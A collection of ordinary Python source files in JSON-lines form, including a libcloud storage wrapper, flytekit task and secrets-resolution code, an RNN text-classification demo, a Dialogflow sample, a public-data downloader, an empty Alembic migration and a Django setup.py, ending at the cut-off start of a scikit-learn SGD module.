{"ext": "py", "sha": "1a2ea122f01cb5680dc97307e94fd9cddb4075fa", "content": "'''\nCreated on 05.01.2014\n\n@author: root\n'''\nfrom org.askalon.jlibcloud.compute.wrapperInterfaces.base import StorageVolume as JStorageVolume\nfrom javaimpl.compute.utils import none_check\n\nclass StorageVolumeImpl(JStorageVolume):\n '''\n classdocs\n '''\n def __init__(self, volume):\n '''\n Constructor\n '''\n #keep a reference to access in jython\n self.volume = volume\n self.obj = volume\n if hasattr(volume, 'uuid'):\n self.uuidp = none_check(volume.uuid, \"\")\n else:\n self.uuidp = \"\"\n if hasattr(volume, 'id'):\n self.idp = none_check(volume.id, \"\")\n else:\n self.idp = \"\"\n if hasattr(volume, 'name'):\n self.namep = none_check(volume.name, \"\")\n else:\n self.namep = \"\"\n if hasattr(volume, 'size'):\n self.sizep = none_check(volume.size, -1)\n else:\n self.sizep = -1\n if hasattr(volume, 'extra'):\n self.extrap = volume.extra\n else:\n self.extrap = {} \n if hasattr(volume, '__repr__()'):\n self.reprp = volume.__repr__()\n else:\n self.reprp = str(volume) \n \n def getUUID(self):\n return self.uuidp\n \n def getId(self):\n return self.idp\n \n def getName(self):\n return self.namep\n \n def getSizeGB(self):\n return self.sizep\n \n def getExtra(self):\n return self.extrap\n \n def attach(self, node, device=None):\n return self.volume.attach(node.node, device)\n \n def detach(self):\n return self.volume.detach()\n \n def destroy(self):\n return self.volume.destroy()\n \n def listSnapshots(self):\n return self.volume.list_snapshots()\n \n def createSnapshot(self, name):\n return self.volume.snapshot(name)\n \n def toString(self):\n return self.reprp"} {"ext": "py", "sha": "1a2ea2af726cdd1dd54a38cdc9d44649d4b224ba", "content": "from __future__ import annotations\n\nimport copy as _copy\nimport enum\nimport logging as _logging\nimport os\nimport pathlib\nimport typing\nfrom dataclasses import dataclass\nfrom datetime import datetime\nfrom inspect import getfullargspec as _getargspec\n\nimport six as _six\n\nfrom flytekit.common import constants as _constants\nfrom flytekit.common import interface as _interface\nfrom flytekit.common import sdk_bases as _sdk_bases\nfrom flytekit.common import utils as _common_utils\nfrom flytekit.common.core.identifier import WorkflowExecutionIdentifier\nfrom flytekit.common.exceptions import scopes as _exception_scopes\nfrom flytekit.common.exceptions import user as _user_exceptions\nfrom flytekit.common.tasks import output as _task_output\nfrom flytekit.common.tasks import task as _base_task\nfrom flytekit.common.types import helpers as _type_helpers\nfrom flytekit.configuration import internal as _internal_config\nfrom flytekit.configuration import resources as _resource_config\nfrom flytekit.configuration import sdk as _sdk_config\nfrom flytekit.configuration import secrets\nfrom flytekit.engines import loader as _engine_loader\nfrom flytekit.interfaces.stats import taggable\nfrom flytekit.models import literals as _literal_models\nfrom flytekit.models import task as _task_models\n\n\nclass SecretsManager(object):\n \"\"\"\n This provides a secrets resolution logic at runtime.\n The resolution order is\n - Try env var first. The env var should have the configuration.SECRETS_ENV_PREFIX. 
The env var will be all upper\n cased\n - If not then try the file where the name matches lower case\n ``configuration.SECRETS_DEFAULT_DIR//configuration.SECRETS_FILE_PREFIX``\n\n All configuration values can always be overridden by injecting an environment variable\n \"\"\"\n\n def __init__(self):\n self._base_dir = str(secrets.SECRETS_DEFAULT_DIR.get()).strip()\n self._file_prefix = str(secrets.SECRETS_FILE_PREFIX.get()).strip()\n self._env_prefix = str(secrets.SECRETS_ENV_PREFIX.get()).strip()\n\n def get(self, group: str, key: str) -> str:\n \"\"\"\n Retrieves a secret using the resolution order -> Env followed by file. If not found raises a ValueError\n \"\"\"\n self.check_group_key(group, key)\n env_var = self.get_secrets_env_var(group, key)\n fpath = self.get_secrets_file(group, key)\n v = os.environ.get(env_var)\n if v is not None:\n return v\n if os.path.exists(fpath):\n with open(fpath, \"r\") as f:\n return f.read().strip()\n raise ValueError(\n f\"Unable to find secret for key {key} in group {group} \" f\"in Env Var:{env_var} and FilePath: {fpath}\"\n )\n\n def get_secrets_env_var(self, group: str, key: str) -> str:\n \"\"\"\n Returns a string that matches the ENV Variable to look for the secrets\n \"\"\"\n self.check_group_key(group, key)\n return f\"{self._env_prefix}{group.upper()}_{key.upper()}\"\n\n def get_secrets_file(self, group: str, key: str) -> str:\n \"\"\"\n Returns a path that matches the file to look for the secrets\n \"\"\"\n self.check_group_key(group, key)\n return os.path.join(self._base_dir, group.lower(), f\"{self._file_prefix}{key.lower()}\")\n\n @staticmethod\n def check_group_key(group: str, key: str):\n if group is None or group == \"\":\n raise ValueError(\"secrets group is a mandatory field.\")\n if key is None or key == \"\":\n raise ValueError(\"secrets key is a mandatory field.\")\n\n\n# TODO: Clean up working dir name\nclass ExecutionParameters(object):\n \"\"\"\n This is a run-time user-centric context object that is accessible to every @task method. It can be accessed using\n\n .. 
code-block:: python\n\n flytekit.current_context()\n\n This object provides the following\n * a statsd handler\n * a logging handler\n * the execution ID as an :py:class:`flytekit.models.core.identifier.WorkflowExecutionIdentifier` object\n * a working directory for the user to write arbitrary files to\n\n Please do not confuse this object with the :py:class:`flytekit.FlyteContext` object.\n \"\"\"\n\n @dataclass(init=False)\n class Builder(object):\n stats: taggable.TaggableStats\n execution_date: datetime\n logging: _logging\n execution_id: str\n attrs: typing.Dict[str, typing.Any]\n working_dir: typing.Union[os.PathLike, _common_utils.AutoDeletingTempDir]\n\n def __init__(self, current: typing.Optional[ExecutionParameters] = None):\n self.stats = current.stats if current else None\n self.execution_date = current.execution_date if current else None\n self.working_dir = current.working_directory if current else None\n self.execution_id = current.execution_id if current else None\n self.logging = current.logging if current else None\n self.attrs = current._attrs if current else {}\n\n def add_attr(self, key: str, v: typing.Any) -> ExecutionParameters.Builder:\n self.attrs[key] = v\n return self\n\n def build(self) -> ExecutionParameters:\n if not isinstance(self.working_dir, _common_utils.AutoDeletingTempDir):\n pathlib.Path(self.working_dir).mkdir(parents=True, exist_ok=True)\n return ExecutionParameters(\n execution_date=self.execution_date,\n stats=self.stats,\n tmp_dir=self.working_dir,\n execution_id=self.execution_id,\n logging=self.logging,\n **self.attrs,\n )\n\n @staticmethod\n def new_builder(current: ExecutionParameters = None) -> Builder:\n return ExecutionParameters.Builder(current=current)\n\n def builder(self) -> Builder:\n return ExecutionParameters.Builder(current=self)\n\n def __init__(self, execution_date, tmp_dir, stats, execution_id, logging, **kwargs):\n \"\"\"\n Args:\n execution_date: Date when the execution is running\n tmp_dir: temporary directory for the execution\n stats: handle to emit stats\n execution_id: Identifier for the xecution\n logging: handle to logging\n \"\"\"\n self._stats = stats\n self._execution_date = execution_date\n self._working_directory = tmp_dir\n self._execution_id = execution_id\n self._logging = logging\n # AutoDeletingTempDir's should be used with a with block, which creates upon entry\n self._attrs = kwargs\n # It is safe to recreate the Secrets Manager\n self._secrets_manager = SecretsManager()\n\n @property\n def stats(self) -> taggable.TaggableStats:\n \"\"\"\n A handle to a special statsd object that provides usefully tagged stats.\n TODO: Usage examples and better comments\n \"\"\"\n return self._stats\n\n @property\n def logging(self) -> _logging:\n \"\"\"\n A handle to a useful logging object.\n TODO: Usage examples\n \"\"\"\n return self._logging\n\n @property\n def working_directory(self) -> _common_utils.AutoDeletingTempDir:\n \"\"\"\n A handle to a special working directory for easily producing temporary files.\n\n TODO: Usage examples\n TODO: This does not always return a AutoDeletingTempDir\n \"\"\"\n return self._working_directory\n\n @property\n def execution_date(self) -> datetime:\n \"\"\"\n This is a datetime representing the time at which a workflow was started. This is consistent across all tasks\n executed in a workflow or sub-workflow.\n\n .. note::\n\n Do NOT use this execution_date to drive any production logic. 
It might be useful as a tag for data to help\n in debugging.\n \"\"\"\n return self._execution_date\n\n @property\n def execution_id(self) -> str:\n \"\"\"\n This is the identifier of the workflow execution within the underlying engine. It will be consistent across all\n task executions in a workflow or sub-workflow execution.\n\n .. note::\n\n Do NOT use this execution_id to drive any production logic. This execution ID should only be used as a tag\n on output data to link back to the workflow run that created it.\n \"\"\"\n return self._execution_id\n\n @property\n def secrets(self) -> SecretsManager:\n return self._secrets_manager\n\n def __getattr__(self, attr_name: str) -> typing.Any:\n \"\"\"\n This houses certain task specific context. For example in Spark, it houses the SparkSession, etc\n \"\"\"\n attr_name = attr_name.upper()\n if self._attrs and attr_name in self._attrs:\n return self._attrs[attr_name]\n raise AssertionError(f\"{attr_name} not available as a parameter in Flyte context - are you in right task-type?\")\n\n def has_attr(self, attr_name: str) -> bool:\n attr_name = attr_name.upper()\n if self._attrs and attr_name in self._attrs:\n return True\n return False\n\n def get(self, key: str) -> typing.Any:\n \"\"\"\n Returns task specific context if present else raise an error. The returned context will match the key\n \"\"\"\n return self.__getattr__(attr_name=key)\n\n\nclass SdkRunnableContainer(_task_models.Container, metaclass=_sdk_bases.ExtendedSdkType):\n \"\"\"\n This is not necessarily a local-only Container object. So long as configuration is present, you can use this object\n \"\"\"\n\n def __init__(\n self,\n command,\n args,\n resources,\n env,\n config,\n ):\n super(SdkRunnableContainer, self).__init__(\"\", command, args, resources, env or {}, config)\n\n @property\n def args(self):\n \"\"\"\n :rtype: list[Text]\n \"\"\"\n return _sdk_config.SDK_PYTHON_VENV.get() + self._args\n\n @property\n def image(self):\n \"\"\"\n :rtype: Text\n \"\"\"\n return _internal_config.IMAGE.get()\n\n @property\n def env(self):\n \"\"\"\n :rtype: dict[Text,Text]\n \"\"\"\n env = super(SdkRunnableContainer, self).env.copy()\n env.update(\n {\n _internal_config.CONFIGURATION_PATH.env_var: _internal_config.CONFIGURATION_PATH.get(),\n _internal_config.IMAGE.env_var: _internal_config.IMAGE.get(),\n # TODO: Phase out the below. 
Propeller will set these and these are not SDK specific\n _internal_config.PROJECT.env_var: _internal_config.PROJECT.get(),\n _internal_config.DOMAIN.env_var: _internal_config.DOMAIN.get(),\n _internal_config.NAME.env_var: _internal_config.NAME.get(),\n _internal_config.VERSION.env_var: _internal_config.VERSION.get(),\n }\n )\n return env\n\n @classmethod\n def get_resources(\n cls,\n storage_request=None,\n cpu_request=None,\n gpu_request=None,\n memory_request=None,\n storage_limit=None,\n cpu_limit=None,\n gpu_limit=None,\n memory_limit=None,\n ):\n \"\"\"\n :param Text storage_request:\n :param Text cpu_request:\n :param Text gpu_request:\n :param Text memory_request:\n :param Text storage_limit:\n :param Text cpu_limit:\n :param Text gpu_limit:\n :param Text memory_limit:\n \"\"\"\n requests = []\n if storage_request:\n requests.append(\n _task_models.Resources.ResourceEntry(_task_models.Resources.ResourceName.STORAGE, storage_request)\n )\n if cpu_request:\n requests.append(_task_models.Resources.ResourceEntry(_task_models.Resources.ResourceName.CPU, cpu_request))\n if gpu_request:\n requests.append(_task_models.Resources.ResourceEntry(_task_models.Resources.ResourceName.GPU, gpu_request))\n if memory_request:\n requests.append(\n _task_models.Resources.ResourceEntry(_task_models.Resources.ResourceName.MEMORY, memory_request)\n )\n\n limits = []\n if storage_limit:\n limits.append(\n _task_models.Resources.ResourceEntry(_task_models.Resources.ResourceName.STORAGE, storage_limit)\n )\n if cpu_limit:\n limits.append(_task_models.Resources.ResourceEntry(_task_models.Resources.ResourceName.CPU, cpu_limit))\n if gpu_limit:\n limits.append(_task_models.Resources.ResourceEntry(_task_models.Resources.ResourceName.GPU, gpu_limit))\n if memory_limit:\n limits.append(\n _task_models.Resources.ResourceEntry(_task_models.Resources.ResourceName.MEMORY, memory_limit)\n )\n\n return _task_models.Resources(limits=limits, requests=requests)\n\n\nclass SdkRunnableTaskStyle(enum.Enum):\n V0 = 0\n V1 = 1\n\n\nclass SdkRunnableTask(_base_task.SdkTask, metaclass=_sdk_bases.ExtendedSdkType):\n \"\"\"\n This class includes the additional logic for building a task that executes in Python code. It has even more\n validation checks to ensure proper behavior than it's superclasses.\n\n Since an SdkRunnableTask is assumed to run by hooking into Python code, we will provide additional shortcuts and\n methods on this object.\n \"\"\"\n\n def __init__(\n self,\n task_function,\n task_type,\n discovery_version,\n retries,\n interruptible,\n deprecated,\n storage_request,\n cpu_request,\n gpu_request,\n memory_request,\n storage_limit,\n cpu_limit,\n gpu_limit,\n memory_limit,\n discoverable,\n timeout,\n environment,\n custom,\n ):\n \"\"\"\n :param task_function: Function container user code. 
This will be executed via the SDK's engine.\n :param Text task_type: string describing the task type\n :param Text discovery_version: string describing the version for task discovery purposes\n :param int retries: Number of retries to attempt\n :param bool interruptible: Specify whether task is interruptible\n :param Text deprecated:\n :param Text storage_request:\n :param Text cpu_request:\n :param Text gpu_request:\n :param Text memory_request:\n :param Text storage_limit:\n :param Text cpu_limit:\n :param Text gpu_limit:\n :param Text memory_limit:\n :param bool discoverable:\n :param datetime.timedelta timeout:\n :param dict[Text, Text] environment:\n :param dict[Text, T] custom:\n \"\"\"\n # Circular dependency\n from flytekit import __version__\n\n self._task_function = task_function\n super(SdkRunnableTask, self).__init__(\n task_type,\n _task_models.TaskMetadata(\n discoverable,\n _task_models.RuntimeMetadata(\n _task_models.RuntimeMetadata.RuntimeType.FLYTE_SDK,\n __version__,\n \"python\",\n ),\n timeout,\n _literal_models.RetryStrategy(retries),\n interruptible,\n discovery_version,\n deprecated,\n ),\n # TODO: If we end up using SdkRunnableTask for the new code, make sure this is set correctly.\n _interface.TypedInterface({}, {}),\n custom,\n container=self._get_container_definition(\n storage_request=storage_request,\n cpu_request=cpu_request,\n gpu_request=gpu_request,\n memory_request=memory_request,\n storage_limit=storage_limit,\n cpu_limit=cpu_limit,\n gpu_limit=gpu_limit,\n memory_limit=memory_limit,\n environment=environment,\n ),\n )\n self.id._name = \"{}.{}\".format(self.task_module, self.task_function_name)\n self._has_fast_registered = False\n\n # TODO: Remove this in the future, I don't think we'll be using this.\n self._task_style = SdkRunnableTaskStyle.V0\n\n _banned_inputs = {}\n _banned_outputs = {}\n\n @_exception_scopes.system_entry_point\n def add_inputs(self, inputs):\n \"\"\"\n Adds the inputs to this task. This can be called multiple times, but it will fail if an input with a given\n name is added more than once, a name collides with an output, or if the name doesn't exist as an arg name in\n the wrapped function.\n :param dict[Text, flytekit.models.interface.Variable] inputs: names and variables\n \"\"\"\n self._validate_inputs(inputs)\n self.interface.inputs.update(inputs)\n\n @classmethod\n def promote_from_model(cls, base_model):\n # TODO: If the task exists in this container, we should be able to retrieve it.\n raise _user_exceptions.FlyteAssertion(\"Cannot promote a base object to a runnable task.\")\n\n @property\n def task_style(self):\n return self._task_style\n\n @property\n def task_function(self):\n return self._task_function\n\n @property\n def task_function_name(self):\n \"\"\"\n :rtype: Text\n \"\"\"\n return self.task_function.__name__\n\n @property\n def task_module(self):\n \"\"\"\n :rtype: Text\n \"\"\"\n return self._task_function.__module__\n\n def validate(self):\n super(SdkRunnableTask, self).validate()\n missing_args = self._missing_mapped_inputs_outputs()\n if len(missing_args) > 0:\n raise _user_exceptions.FlyteAssertion(\n \"The task {} is invalid because not all inputs and outputs in the \"\n \"task function definition were specified in @outputs and @inputs. \"\n \"We are missing definitions for {}.\".format(self, missing_args)\n )\n\n @_exception_scopes.system_entry_point\n def unit_test(self, **input_map):\n \"\"\"\n :param dict[Text, T] input_map: Python Std input from users. 
We will cast these to the appropriate Flyte\n literals.\n :returns: Depends on the behavior of the specific task in the unit engine.\n \"\"\"\n return (\n _engine_loader.get_engine(\"unit\")\n .get_task(self)\n .execute(\n _type_helpers.pack_python_std_map_to_literal_map(\n input_map,\n {\n k: _type_helpers.get_sdk_type_from_literal_type(v.type)\n for k, v in _six.iteritems(self.interface.inputs)\n },\n )\n )\n )\n\n @_exception_scopes.system_entry_point\n def local_execute(self, **input_map):\n \"\"\"\n :param dict[Text, T] input_map: Python Std input from users. We will cast these to the appropriate Flyte\n literals.\n :rtype: dict[Text, T]\n :returns: The output produced by this task in Python standard format.\n \"\"\"\n return (\n _engine_loader.get_engine(\"local\")\n .get_task(self)\n .execute(\n _type_helpers.pack_python_std_map_to_literal_map(\n input_map,\n {\n k: _type_helpers.get_sdk_type_from_literal_type(v.type)\n for k, v in _six.iteritems(self.interface.inputs)\n },\n )\n )\n )\n\n def _execute_user_code(self, context, inputs):\n \"\"\"\n :param flytekit.engines.common.EngineContext context:\n :param dict[Text, T] inputs: This variable is a bit of a misnomer, since it's both inputs and outputs. The\n dictionary passed here will be passed to the user-defined function, and will have values that are a\n variety of types. The T's here are Python std values for inputs. If there isn't a native Python type for\n something (like Schema or Blob), they are the Flyte classes. For outputs they are OutputReferences.\n (Note that these are not the same OutputReferences as in BindingData's)\n :rtype: Any: the returned object from user code.\n :returns: This function must return a dictionary mapping 'filenames' to Flyte Interface Entities. These\n entities will be used by the engine to pass data from node to node, populate metadata, etc. etc.. Each\n engine will have different behavior. For instance, the Flyte engine will upload the entities to a remote\n working directory (with the names provided), which will in turn allow Flyte Propeller to push along the\n workflow. Where as local engine will merely feed the outputs directly into the next node.\n \"\"\"\n if self.task_style == SdkRunnableTaskStyle.V0:\n return _exception_scopes.user_entry_point(self.task_function)(\n ExecutionParameters(\n execution_date=context.execution_date,\n # TODO: it might be better to consider passing the full struct\n execution_id=_six.text_type(WorkflowExecutionIdentifier.promote_from_model(context.execution_id)),\n stats=context.stats,\n logging=context.logging,\n tmp_dir=context.working_directory,\n ),\n **inputs,\n )\n\n @_exception_scopes.system_entry_point\n def execute(self, context, inputs):\n \"\"\"\n :param flytekit.engines.common.EngineContext context:\n :param flytekit.models.literals.LiteralMap inputs:\n :rtype: dict[Text, flytekit.models.common.FlyteIdlEntity]\n :returns: This function must return a dictionary mapping 'filenames' to Flyte Interface Entities. These\n entities will be used by the engine to pass data from node to node, populate metadata, etc. etc.. Each\n engine will have different behavior. For instance, the Flyte engine will upload the entities to a remote\n working directory (with the names provided), which will in turn allow Flyte Propeller to push along the\n workflow. 
Where as local engine will merely feed the outputs directly into the next node.\n \"\"\"\n inputs_dict = _type_helpers.unpack_literal_map_to_sdk_python_std(\n inputs, {k: _type_helpers.get_sdk_type_from_literal_type(v.type) for k, v in self.interface.inputs.items()}\n )\n outputs_dict = {\n name: _task_output.OutputReference(_type_helpers.get_sdk_type_from_literal_type(variable.type))\n for name, variable in _six.iteritems(self.interface.outputs)\n }\n\n # Old style - V0: If annotations are used to define outputs, do not append outputs to the inputs dict\n if not self.task_function.__annotations__ or \"return\" not in self.task_function.__annotations__:\n inputs_dict.update(outputs_dict)\n self._execute_user_code(context, inputs_dict)\n return {\n _constants.OUTPUT_FILE_NAME: _literal_models.LiteralMap(\n literals={k: v.sdk_value for k, v in _six.iteritems(outputs_dict)}\n )\n }\n\n @_exception_scopes.system_entry_point\n def fast_register(self, project, domain, name, digest, additional_distribution, dest_dir) -> str:\n \"\"\"\n The fast register call essentially hijacks the task container commandline.\n Say an existing task container definition had a commandline like so:\n flyte_venv pyflyte-execute --task-module app.workflows.my_workflow --task-name my_task\n\n The fast register command introduces a wrapper call to fast-execute the original commandline like so:\n flyte_venv pyflyte-fast-execute --additional-distribution s3://my-s3-bucket/foo/bar/12345.tar.gz --\n flyte_venv pyflyte-execute --task-module app.workflows.my_workflow --task-name my_task\n\n At execution time pyflyte-fast-execute will ensure the additional distribution (i.e. the fast-registered code)\n exists before calling the original task commandline.\n\n :param Text project: The project in which to register this task.\n :param Text domain: The domain in which to register this task.\n :param Text name: The name to give this task.\n :param Text digest: The version in which to register this task.\n :param Text additional_distribution: User-specified location for remote source code distribution.\n :param Text The optional location for where to install the additional distribution at runtime\n :rtype: Text: Registered identifier.\n \"\"\"\n\n original_container = self.container\n container = _copy.deepcopy(original_container)\n args = [\"pyflyte-fast-execute\", \"--additional-distribution\", additional_distribution]\n if dest_dir:\n args += [\"--dest-dir\", dest_dir]\n args += [\"--\"] + container.args\n container._args = args\n self._container = container\n\n try:\n registered_id = self.register(project, domain, name, digest)\n except Exception:\n self._container = original_container\n raise\n self._has_fast_registered = True\n self._container = original_container\n return str(registered_id)\n\n @property\n def has_fast_registered(self) -> bool:\n return self._has_fast_registered\n\n def _get_container_definition(\n self,\n storage_request=None,\n cpu_request=None,\n gpu_request=None,\n memory_request=None,\n storage_limit=None,\n cpu_limit=None,\n gpu_limit=None,\n memory_limit=None,\n environment=None,\n cls=None,\n ):\n \"\"\"\n :param Text storage_request:\n :param Text cpu_request:\n :param Text gpu_request:\n :param Text memory_request:\n :param Text storage_limit:\n :param Text cpu_limit:\n :param Text gpu_limit:\n :param Text memory_limit:\n :param dict[Text,Text] environment:\n :param cls Optional[type]: Type of container to instantiate. 
Generally should subclass SdkRunnableContainer.\n :rtype: flytekit.models.task.Container\n \"\"\"\n storage_limit = storage_limit or _resource_config.DEFAULT_STORAGE_LIMIT.get()\n storage_request = storage_request or _resource_config.DEFAULT_STORAGE_REQUEST.get()\n cpu_limit = cpu_limit or _resource_config.DEFAULT_CPU_LIMIT.get()\n cpu_request = cpu_request or _resource_config.DEFAULT_CPU_REQUEST.get()\n gpu_limit = gpu_limit or _resource_config.DEFAULT_GPU_LIMIT.get()\n gpu_request = gpu_request or _resource_config.DEFAULT_GPU_REQUEST.get()\n memory_limit = memory_limit or _resource_config.DEFAULT_MEMORY_LIMIT.get()\n memory_request = memory_request or _resource_config.DEFAULT_MEMORY_REQUEST.get()\n\n resources = SdkRunnableContainer.get_resources(\n storage_request, cpu_request, gpu_request, memory_request, storage_limit, cpu_limit, gpu_limit, memory_limit\n )\n\n return (cls or SdkRunnableContainer)(\n command=[],\n args=[\n \"pyflyte-execute\",\n \"--task-module\",\n self.task_module,\n \"--task-name\",\n self.task_function_name,\n \"--inputs\",\n \"{{.input}}\",\n \"--output-prefix\",\n \"{{.outputPrefix}}\",\n \"--raw-output-data-prefix\",\n \"{{.rawOutputDataPrefix}}\",\n ],\n resources=resources,\n env=environment,\n config={},\n )\n\n def _validate_inputs(self, inputs):\n \"\"\"\n This method should be overridden in sub-classes that intend to do additional checks on inputs. If validation\n fails, this function should raise an informative exception.\n :param dict[Text, flytekit.models.interface.Variable] inputs: Input variables to validate\n :raises: flytekit.common.exceptions.user.FlyteValidationException\n \"\"\"\n super(SdkRunnableTask, self)._validate_inputs(inputs)\n for k, v in _six.iteritems(inputs):\n if not self._is_argname_in_function_definition(k):\n raise _user_exceptions.FlyteValidationException(\n \"The input named '{}' was not specified in the task function. Therefore, this input cannot be \"\n \"provided to the task.\".format(k)\n )\n if _type_helpers.get_sdk_type_from_literal_type(v.type) in type(self)._banned_inputs:\n raise _user_exceptions.FlyteValidationException(\n \"The input '{}' is not an accepted input type.\".format(v)\n )\n\n def _validate_outputs(self, outputs):\n \"\"\"\n This method should be overridden in sub-classes that intend to do additional checks on outputs. If validation\n fails, this function should raise an informative exception.\n :param dict[Text, flytekit.models.interface.Variable] outputs: Output variables to validate\n :raises: flytekit.common.exceptions.user.FlyteValidationException\n \"\"\"\n super(SdkRunnableTask, self)._validate_outputs(outputs)\n for k, v in _six.iteritems(outputs):\n if not self._is_argname_in_function_definition(k):\n raise _user_exceptions.FlyteValidationException(\n \"The output named '{}' was not specified in the task function. 
Therefore, this output cannot be \"\n \"provided to the task.\".format(k)\n )\n if _type_helpers.get_sdk_type_from_literal_type(v.type) in type(self)._banned_outputs:\n raise _user_exceptions.FlyteValidationException(\n \"The output '{}' is not an accepted output type.\".format(v)\n )\n\n def _get_kwarg_inputs(self):\n # Trim off first parameter as it is reserved for workflow_parameters\n return set(_getargspec(self.task_function).args[1:])\n\n def _is_argname_in_function_definition(self, key):\n return key in self._get_kwarg_inputs()\n\n def _missing_mapped_inputs_outputs(self):\n # Trim off first parameter as it is reserved for workflow_parameters\n args = self._get_kwarg_inputs()\n inputs_and_outputs = set(self.interface.outputs.keys()) | set(self.interface.inputs.keys())\n return args ^ inputs_and_outputs\n"} {"ext": "py", "sha": "1a2ea3181e94fd94bc50e28da8a2d0ae58cf4fe6", "content": "# A sample recursive neural network for text classification\n# @Time: 8/13/2020\n# @Author: lnblanke\n# @Email: fjh314.84@gmail.com\n# @File: cnn.py\n\nimport numpy as np\nimport tensorflow as tf\nfrom blocks import RNN, Dense\nfrom model import Model\nimport os\n\npath = os.path.join(\"glove.6B.100d.txt\")\n\nembedding_indices = {}\n\nwith open(path) as f:\n for line in f:\n word, coef = line.split(maxsplit = 1)\n coef = np.fromstring(coef, \"f\", sep = \" \")\n\n embedding_indices[word] = coef\n\n\ndef embedding(x):\n word_idx = tf.keras.datasets.imdb.get_word_index()\n embedding_dim = 100\n\n l, w = x.shape\n embed = np.zeros((l, w, embedding_dim))\n\n vec_to_word = {vec + 3: ww for ww, vec in word_idx.items()}\n vec_to_word[0] = \"\"\n vec_to_word[1] = \"\"\n vec_to_word[2] = \"\"\n\n for i in range(l):\n for j in range(w):\n embedding_vec = embedding_indices.get(vec_to_word[x[i][j]])\n\n if embedding_vec is not None:\n embed[i][j] = embedding_vec\n\n return embed\n\n\nword_size = 15000\n\n(train_x, train_y), (test_x, test_y) = tf.keras.datasets.imdb.load_data(num_words = word_size)\n\nmax_len = 300\ntrain_x = tf.keras.preprocessing.sequence.pad_sequences(train_x, max_len)[:1000]\ntrain_y = train_y[:1000]\ntest_x = tf.keras.preprocessing.sequence.pad_sequences(test_x, max_len)[:200]\ntest_y = test_y[:200]\n\ntrain_x_embed = embedding(train_x)\ntest_x_embed = embedding(test_x)\n\nrate = 1e-2 # Learning rate\nepoch = 100 # Learning epochs\npatience = 10 # Early stop patience\n\nmodel = Model(\"RNN\")\nmodel.add(RNN(input_size = 100, output_size = 64, units = 128))\nmodel.add(Dense(64, 2, activation = \"softmax\"))\n\nif __name__ == '__main__':\n model.fit(train_x_embed, train_y, loss_func = \"cross entropy loss\", epochs = epoch, learning_rate = rate,\n patience = patience)\n\n pred = model.predict(test_x_embed)\n\n print(\"Accuracy: %.2f\" % (np.sum(pred == test_y) / len(test_y) * 100) + \"%\")\n"} {"ext": "py", "sha": "1a2ea31bf03207358eb5c02a59efac22ead89f6f", "content": "# -*- coding: utf-8 -*-\n# Copyright 2022 Google LLC\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n# Generated code. 
DO NOT EDIT!\n#\n# Snippet for CreateDocument\n# NOTE: This snippet has been automatically generated for illustrative purposes only.\n# It may require modifications to work in your environment.\n\n# To install the latest published package dependency, execute the following:\n# python3 -m pip install google-cloud-dialogflow\n\n\n# [START dialogflow_v2_generated_Documents_CreateDocument_sync]\nfrom google.cloud import dialogflow_v2\n\n\ndef sample_create_document():\n # Create a client\n client = dialogflow_v2.DocumentsClient()\n\n # Initialize request argument(s)\n document = dialogflow_v2.Document()\n document.content_uri = \"content_uri_value\"\n document.display_name = \"display_name_value\"\n document.mime_type = \"mime_type_value\"\n document.knowledge_types = [\"AGENT_FACING_SMART_REPLY\"]\n\n request = dialogflow_v2.CreateDocumentRequest(\n parent=\"parent_value\",\n document=document,\n )\n\n # Make the request\n operation = client.create_document(request=request)\n\n print(\"Waiting for operation to complete...\")\n\n response = operation.result()\n\n # Handle the response\n print(response)\n\n# [END dialogflow_v2_generated_Documents_CreateDocument_sync]\n"} {"ext": "py", "sha": "1a2ea33be5b1c12b6b57d8e9ec275581e3599fc4", "content": "#Download Data and Save Data\n\nimport urllib\n\nprint \"downloading with urllib\"\n\n# base URL of the public S3 bucket; the archives listed below are fetched one by one\nbase_url = \"http://s3.amazonaws.com/open_data/\"\n\nfiles = [\n \"opendata_giftcards000.gz\",\n \"opendata_giving_page_projects000.gz\",\n \"opendata_giving_pages000.gz\",\n \"opendata_essays000.gz\",\n \"opendata_resources000.gz\",\n \"opendata_donations000.gz\",\n \"opendata_projects000.gz\",\n]\n\n# download each archive and save it locally under the same file name\nfor name in files:\n dl_url = base_url + name\n print \"downloading %s\" % dl_url\n urllib.urlretrieve(dl_url, name)\n"} {"ext": "py", "sha": "1a2ea363968078399a54b10dc83f806c9fe801d3", "content": "\"\"\"Initial migration\n\nRevision ID: e4ef83148109\nRevises: \nCreate Date: 2021-11-25 12:45:30.514576\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'e4ef83148109'\ndown_revision = None\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n pass\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust!
###\n pass\n # ### end Alembic commands ###\n"} {"ext": "py", "sha": "1a2ea3684f76dacee9cee3bfdd0a4cf2e4102106", "content": "import os\nfrom setuptools import setup, find_packages\n\nwith open(os.path.join(os.path.dirname(__file__), 'README.rst')) as readme:\n README = readme.read()\n\n# allow setup.py to be run from any path\nos.chdir(os.path.normpath(os.path.join(os.path.abspath(__file__), os.pardir)))\n\nsetup(\n name='django_admin_monitoring',\n version='0.1.3',\n packages=find_packages(),\n include_package_data=True,\n license='MIT License',\n description='A simple Django app that provides ability to monitor such things as user feedback in admin',\n long_description=README,\n url='https://github.com/eternalfame/django_admin_monitoring',\n author='Vyacheslav Sukhenko',\n author_email='eternalfame@mail.ru',\n classifiers=[\n 'Environment :: Web Environment',\n 'Framework :: Django',\n 'Intended Audience :: Developers',\n 'License :: OSI Approved :: MIT License',\n 'Operating System :: OS Independent',\n 'Programming Language :: Python',\n 'Topic :: Internet :: WWW/HTTP',\n 'Topic :: Internet :: WWW/HTTP :: Dynamic Content',\n ],\n)"} {"ext": "py", "sha": "1a2ea48516f54a1066414fdda5b0d25b2432255c", "content": "# Authors: Peter Prettenhofer (main author)\r\n# Mathieu Blondel (partial_fit support)\r\n#\r\n# License: BSD 3 clause\r\n\"\"\"Classification and regression using Stochastic Gradient Descent (SGD).\"\"\"\r\n\r\nimport numpy as 